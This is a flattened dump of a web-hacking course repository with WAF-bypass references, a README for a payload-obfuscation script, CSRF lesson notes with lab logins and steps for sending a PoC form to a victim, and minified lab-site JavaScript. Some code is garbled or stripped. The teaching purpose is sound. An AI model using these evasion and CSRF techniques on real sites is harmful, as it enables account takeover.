In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright {yyyy} {name of copyright owner} 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/character-interpretations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/character-interpretations.png -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/how-wafs-work.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/how-wafs-work.png -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/waf-general-arch.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/images/waf-general-arch.png -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/others/README.md: -------------------------------------------------------------------------------- 1 | ## [`obfu.py`](https://github.com/0xinfection/awesome-waf/blob/master/others/obfu.py) 2 | > A small script to encode and obfuscate your payloads easily to your desired encodings. 3 | 4 | ### Usage: 5 | ``` 6 | $ python obfu.py -h 7 | 8 | OBFUSCATOR 9 | 10 | usage: python3 obfu.py [-h] [-s STR] [-e ENC] [-ueo] [-udi] 11 | 12 | Required Arguments: 13 | -s STR, --str STR String to obfuscate 14 | -e ENC, --enc ENC Encoding type. eg: ibm037, utf16, etc 15 | 16 | Optional Arguments: 17 | -ueo URL Encode Output 18 | -udi URL Decode Input 19 | ``` 20 | ### Example Usage: 21 | ``` 22 | $ python3 obfu.py -s 'param= 1: 57 | parser.print_help() 58 | quit() 59 | print('Input: %s' % (args.str)) 60 | print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo))) 61 | 62 | if __name__ == '__main__': 63 | main() 64 | -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Artificial Neural Network based WAF for SQL Injection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Artificial Neural Network based WAF for SQL Injection.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Bypassing WAF XSS Detection Mechanisms.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Bypassing WAF XSS Detection Mechanisms.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Evading All Web-Application Firewalls XSS Filters.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Evading All Web-Application Firewalls XSS Filters.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Poking A Hole In The Firewall.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Poking A Hole In The Firewall.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/SANS Guide - WAF Evasion Testing.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/SANS Guide - WAF Evasion Testing.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/WASC WAF Evaluation Criteria.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/WASC WAF Evaluation Criteria.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Web Application Firewalls - Evaluation and Analysis.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Web Application Firewalls - Evaluation and Analysis.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/A Forgotten HTTP Invisibility Cloak.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/A Forgotten HTTP Invisibility Cloak.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Methods To Bypass A Web Application Firewall.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Methods To Bypass A Web Application Firewall.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/OWASP WAF Profiling & Evasion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/OWASP WAF Profiling & Evasion.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Our 
Favourite XSS WAF Filters And How To Bypass Them.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Playing Around with WAFs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Playing Around with WAFs.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/WAF Bypasses and PHP Exploits (Slides).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/WAF Bypasses and PHP Exploits (Slides).pdf -------------------------------------------------------------------------------- /lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/WEb 
Application Firewall Bypassing (How to Defeat the Blue Team).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [![made-with-html](https://img.shields.io/badge/Made%20with-HTML-1f425f.svg)](https://html.com/) [![instructure-dr.404](https://img.shields.io/badge/Instructor-Dr.404-brightgreen)](https://www.facebook.com/htunaungkyawMPC) 4 | 5 | 6 | 7 | # Cross-Site Request Forgery (CSRF) 8 | 9 | - an attack that forces an end user `to execute unwanted actions` on a web application in which they’re `currently authenticated`. 10 | 11 | - With a little help from `social engineering` (such as sending a link via email or chat), an attacker may trick a user into executing actions of the attacker's choosing. 12 | 13 | - If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like `transferring funds`, `changing their password`, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 14 | 15 | [Reference-OWASP](https://owasp.org/www-community/attacks/csrf) 16 | 17 | ![CSRF](../photo/csrf.png) 18 | 19 | 20 | 21 | # Common defenses against CSRF 22 | 23 | [Reference_portswigger.net](https://portswigger.net/web-security/csrf) 24 | 25 | The most common defenses are as follows: 26 | 27 | - CSRF tokens - A CSRF token is a unique, secret, and unpredictable value that is generated by the server-side application and shared with the client. When attempting to perform a sensitive action, such as submitting a form, the client must include the correct CSRF token in the request. 
This makes it very difficult for an attacker to construct a valid request on behalf of the victim. 28 | 29 | 30 | - Referer-based validation - Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. This is generally less effective than CSRF token validation. 31 | 32 | ![CSRF](../photo/anti_csrf.png) 33 | 34 | 35 | # Lab Demo 36 | 37 | ## Lab Website 38 | 39 | `http://testfire.net/login.jsp` 40 | 41 | ## Lab Credentials 42 | 43 | ``` 44 | username = jsmith 45 | password = demo1234 46 | 47 | ``` 48 | 49 | ## Example CSRF PoC Form 50 | 51 | ```html 52 |

CSRF

53 |
54 | 55 | 56 | 57 |
58 | 61 | 62 | ``` 63 | 64 | ## Lab Steps 65 | 66 | 1. Construct the `CSRF Form` manually or using the Burp Suite `engagement tools (CSRF PoC)`. 67 | 68 | 2. Run a web server and send the link to the victim 69 | 70 | 3. Exploit -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_exploit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 | 8 |
9 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_form.html: -------------------------------------------------------------------------------- 1 |

CSRF

2 |
3 | 4 | 5 | 6 |
7 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense.md: -------------------------------------------------------------------------------- 1 | # PortSwigger Lab (CSRF with no defense) 2 | 3 | 4 | ## Three key conditions for a successful CSRF attack: 5 | 6 | - `A relevant action`. There is an action within the application that the attacker has a reason to induce. This might be a privileged action (such as modifying permissions for other users) or any action on user-specific data (such as changing the user's own password). 7 | 8 | - `Cookie-based session handling`. Performing the action involves issuing one or more HTTP requests, and the application relies solely on session cookies to identify the user who has made the requests. There is no other mechanism in place for tracking sessions or validating user requests. 9 | 10 | - `No unpredictable request parameters`. The requests that perform the action do not contain any parameters whose values the attacker cannot determine or guess. For example, when causing a user to change their password, `the function is not vulnerable if an attacker needs to know the value of the existing password`. 
11 | 12 | 13 | 14 | # Lab Information 15 | 16 | #### Vulnearable parameter 17 | 18 | - email change utility 19 | 20 | #### Login info 21 | 22 | - `wiener:peter` 23 | 24 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/academy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/academy.png -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LfgVpcUAAAAAMLiC7gC5kn_9oQizGINumO8VgHm');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/RGRQD9tdxHtnt-Bxkx9pM75S/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-W8ETClQtM/DZAB3p5sw146UrQAPyub9gIZYHQB3Ey3l+JjCXJORASw7N7e2EBWxw';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/burp-suite-icon.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/burp-suite.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/burp-suite.jpg -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/community.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/dastardly.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/enterprise.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/latest-burp-suite-software-download.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/latest-burp-suite-software-download.jpg -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/portswigger-logo.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 10 | 12 | 14 | 18 | 19 | 20 | 24 | 28 | 31 | 33 | 34 | 36 | 37 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/professional.svg: 
-------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/register.js: -------------------------------------------------------------------------------- 1 | function PsFormData(n){var t=Object.create(PsFormData.prototype),r,i;if(t.values=[],t.append("ajaxRequest",!0),n)for(r=n.elements,i=0;i{if(!ps.isArray(n))return"";const t=[];return n.forEach((n,i)=>{for(let r in n)n.hasOwnProperty(r)&&t.push(`[${i}].${encodeURIComponent(r)}`+"="+encodeURIComponent(n[r]))}),t.join("&").replace(/%20/g,"+")};ps.ajax=function(n){var e=function(t){try{if(n.done)if(t.status===204)n.done(t,t.status);else{var i=t.getResponseHeader("content-type").startsWith("application/json");n.done(t,t.status,i?JSON.parse(t.responseText):t.responseText)}}catch(r){console.error(r)}},r=function(t){try{n.fail&&n.fail(t,t.status,t.statusText)}catch(i){console.error(i)}},u=function(t){try{n.always&&n.always(t,t.status)}catch(i){console.error(i)}},o=function(n,t){return t instanceof FormData?t:t instanceof PsFormData?(n.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ps.params(t.values)):(n.setRequestHeader("Content-Type","application/json"),JSON.stringify(t))},t=new XMLHttpRequest,i,f;try{if(t.open(n.method||"GET",n.url),n.headers)for(i=0;i=200&&t.status<300||t.status===304?e(t):r(t);u(t)};t.addEventListener("error",function(){r(t);u(t)});n.beforeSend&&n.beforeSend(t);t.send(f)}catch(s){r(t);u(t)}return t};ps.ajaxResultCodes={Error:1,NotFound:2,Redirect:3,Return:4,Ok:5,Warn:6};ps.notificationTypes={Error:"error",Info:"info",Success:"success",Warn:"warn"};ps.string={isNullOrEmpty:function(n){return typeof n=="undefined"||n===null||n.length===0},isNullOrWhiteSpaces:function(n){return typeof n=="undefined"||n===null||n.match(/^ *$/)!==null},isNullOrWhiteSpacesAndNewLines:function(n){return typeof 
n=="undefined"||n===null||ps.string.isNullOrEmpty(n.replace(/\s+/,""))},isValidHash:function(n){return/^#[a-z0-9-]+$/i.test(n)}};ps.url={isLocalUrl:function(n){return ps.string.isNullOrEmpty(n)?!1:n.charAt(0)!=="/"?!1:n.length===1||n.charAt(1).match(/[a-z0-9]/i)}};UrlHistory.prototype.items=[];UrlHistory.prototype.clear=function(){this.items=[];this.persistData()};UrlHistory.prototype.hasRecords=function(){return this.items.length>0};UrlHistory.prototype.persistData=function(){sessionStorage.setItem("urlHistory",JSON.stringify(this.items))};UrlHistory.prototype.pop=function(){var t=this,n;do n=t.items.pop();while(n===location.pathname);if(t.persistData(),ps.url.isLocalUrl(n))return n;throw new Error("Invalid URL.");};UrlHistory.prototype.push=function(n){var t=this;ps.url.isLocalUrl(n)&&(t.items.length===0||t.items[t.items.length-1]!==n)&&(t.items.push(n),t.persistData())};UrlHistory.prototype.update=function(){var n=this;n.items.length>2&&n.items[n.items.length-3]===n.items[n.items.length-1]&&(n.items.pop(),n.items.pop(),n.persistData())};ps.urlHistory=new UrlHistory;ps.wrapperFunctions.trigger=function(n,t){var i=document.createEvent("Event");i.initEvent(n,!0,!0);i.data=t;this.dispatchEvent(i)};NotificationRenderer.prototype.getDetailsElement=function(n,t){var r=this,i=ps(document.createElement("div"));return i.addClass("notification-detailboxes"),i.addClass("hidden"),i.addClass(t),n.details.forEach(function(n){var 
t=ps(document.createElement("div")),u,o,f,e;t.addClass("notification-detailbox");u=ps(document.createElement("div"));u.addClass("notification-detailbox-logobox");o=ps(document.createElement("span"));o.addClass(r.getTypeIconClass(n.type,!0));u.appendChild(o);t.appendChild(u);f=ps(document.createElement("div"));f.addClass("notification-detailbox-textbox");e=ps(document.createElement("div"));e.addClass("notification-detailbox-textbox-message");e.appendChild(document.createTextNode(n.message));f.appendChild(e);t.appendChild(f);i.appendChild(t)}),i};NotificationRenderer.prototype.getTypeIconClass=function(n,t){var i;switch(n){case ps.notificationTypes.Error:case ps.notificationTypes.Warn:i=t?"icomoonicon-notification":"icomoonicon-notification2";break;case ps.notificationTypes.Info:case ps.notificationTypes.Success:i=t?"icomoonicon-info":"icomoonicon-info2";break;default:i=""}return i};NotificationRenderer.prototype.getSummaryElement=function(n,t){var a=this,l="",i,f,e,o,h,c,s,r,u;if(n.message||(l="is-messageless"),i=ps(document.createElement("div")),i.addClass("notification-summarybox"),i.addClass(t),f=ps(document.createElement("div")),f.addClass("notification-summarybox-logobox"),f.addClass(l),e=ps(document.createElement("span")),e.addClass("notification-summarybox-logobox-icon"),e.addClass(a.getTypeIconClass(n.type)),e.addClass(l),f.appendChild(e),i.appendChild(f),o=ps(document.createElement("div")),o.addClass("notification-summarybox-textbox"),h=ps(document.createElement("div")),h.addClass("notification-summarybox-textbox-title"),h.appendChild(document.createTextNode(n.title)),o.appendChild(h),c=ps(document.createElement("div")),c.addClass("notification-summarybox-textbox-message"),c.appendChild(document.createTextNode(n.message)),o.appendChild(c),i.appendChild(o),s=ps(document.createElement("div")),s.addClass("notification-summarybox-actionbox"),n.hasDetails()){r=ps(document.createElement("span"));r.addClass("notification-summarybox-actionbox-icon");r.addClass("icom
oonicon-circle-up2");r.addClass(t);r.on("click",function(){var n=ps(this);n.toggleClass("icomoonicon-circle-down2");n.trigger("togglenoticationdetails")});s.appendChild(r)}u=ps(document.createElement("span"));u.addClass("notification-summarybox-actionbox-icon");u.addClass("icomoonicon-cancel-circle");u.addClass(t);u.on("click",function(){ps(this).trigger("closenotification")});return s.appendChild(u),i.appendChild(s),i};NotificationRenderer.prototype.getTypeClass=function(n){var t;switch(n){case ps.notificationTypes.Error:t="is-error";break;case ps.notificationTypes.Info:t="is-info";break;case ps.notificationTypes.Success:t="is-success";break;case ps.notificationTypes.Warn:t="is-warn";break;default:t=""}return t};NotificationRenderer.prototype.run=function(n){var r=this,t=ps(document.createElement("div")),i;t.autoClose=n.type===ps.notificationTypes.Info||n.type===ps.notificationTypes.Success;t.close=function(){document.body.removeChild(this)};t.toggleDetails=function(){t.find(".notification-detailboxes")[0].toggleClass("hidden")};t.addClass("notification");i=r.getTypeClass(n.type);t.addClass(i);t.on("mouseover",function(){t.autoClose=!1});t.on("closenotification",t.close);t.on("togglenoticationdetails",t.toggleDetails);t.appendChild(r.getSummaryElement(n,i));n.hasDetails()&&t.appendChild(r.getDetailsElement(n,i));document.body.appendChild(t);t.autoClose&&setTimeout(function(){t.autoClose&&t.close()},8e3)};Notification.prototype.hasDetails=function(){return this.details.length!==0};Notifier.prototype.error=function(n,t){this.notify(new Notification(ps.notificationTypes.Error,n,t))};Notifier.prototype.info=function(n,t){this.notify(new Notification(ps.notificationTypes.Info,n,t))};Notifier.prototype.notify=function(n){(new NotificationRenderer).run(n)};Notifier.prototype.success=function(n,t){this.notify(new Notification(ps.notificationTypes.Success,n,t))};Notifier.prototype.warn=function(n,t){this.notify(new 
Notification(ps.notificationTypes.Warn,n,t))};AjaxResultProcessor.prototype.defaultResultCallback=function(n){this.displayNotification(n)};AjaxResultProcessor.prototype.displayNotification=function(n){var i=this,u=i.getNotificationType(n.Messages.Summary.Type),f=n.Messages.Summary.Title,r,t;n.Messages.Summary.Value&&(r=n.Messages.Summary.Value);n.Messages.Details.length>0&&(t=[],n.Messages.Details.forEach(function(n){t.push(new NotificationDetail(i.getNotificationType(n.Type),n.Value))}));(new Notifier).notify(new Notification(u,f,r,t))};AjaxResultProcessor.prototype.getNotificationType=function(n){var t;switch(n){case 1:t=ps.notificationTypes.Success;break;case 2:t=ps.notificationTypes.Warn;break;case 3:t=ps.notificationTypes.Error;break;default:t=ps.notificationTypes.Info}return t};AjaxResultProcessor.prototype.handleResult=function(n,t){var i=this,r,u;if(n.Status===ps.ajaxResultCodes.NotFound)window.location.replace("/notfound");else if(n.Status===ps.ajaxResultCodes.Redirect)n.AdditionalData&&typeof n.AdditionalData.ClearUrlHistory=="boolean"&&n.AdditionalData.ClearUrlHistory&&ps.urlHistory.clear(),window.location=n.ResultSet;else if(n.Status===ps.ajaxResultCodes.Return)try{r=ps.urlHistory.pop();ps.url.isLocalUrl(r)?window.location=r:i.reportError()}catch(f){i.reportError()}else u=t||i.defaultResultCallback,u.call(null,n)};AjaxResultProcessor.prototype.reportError=function(){(new Notifier).error("An error has occurred.","Please contact your administrator.")};var 
KeyCode={Cancel:3,Help:6,BackSpace:8,Tab:9,Clear:12,Enter:13,Shift:16,Control:17,Alt:18,Pause:19,CapsLock:20,Escape:27,Space:32,PageUp:33,PageDown:34,End:35,Home:36,Left:37,Up:38,Right:39,Down:40,PrintScreen:44,Insert:45,Delete:46,Num0:48,Num1:49,Num2:50,Num3:51,Num4:52,Num5:53,Num6:54,Num7:55,Num8:56,Num9:57,SemiColon:59,Equals:61,A:65,B:66,C:67,D:68,E:69,F:70,G:71,H:72,I:73,J:74,K:75,L:76,M:77,N:78,O:79,P:80,Q:81,R:82,S:83,T:84,U:85,V:86,W:87,X:88,Y:89,Z:90,ContextMenu:93,NumPad0:96,NumPad1:97,NumPad2:98,NumPad3:99,NumPad4:100,NumPad5:101,NumPad6:102,NumPad7:103,NumPad8:104,NumPad9:105,Multiply:106,Add:107,Separator:108,Subtract:109,Decimal:110,Divide:111,F1:112,F2:113,F3:114,F4:115,F5:116,F6:117,F7:118,F8:119,F9:120,F10:121,F11:122,F12:123,F13:124,F14:125,F15:126,F16:127,F17:128,F18:129,F19:130,F20:131,F21:132,F22:133,F23:134,F24:135,NumLock:144,ScrollLock:145,Comma:188,Period:190,Slash:191,BackQuote:192,OpenBracket:219,BackSlash:220,CloseBracket:221,Quote:222,Meta:224},loadToken=function(n,t,i){var r,u;if(typeof 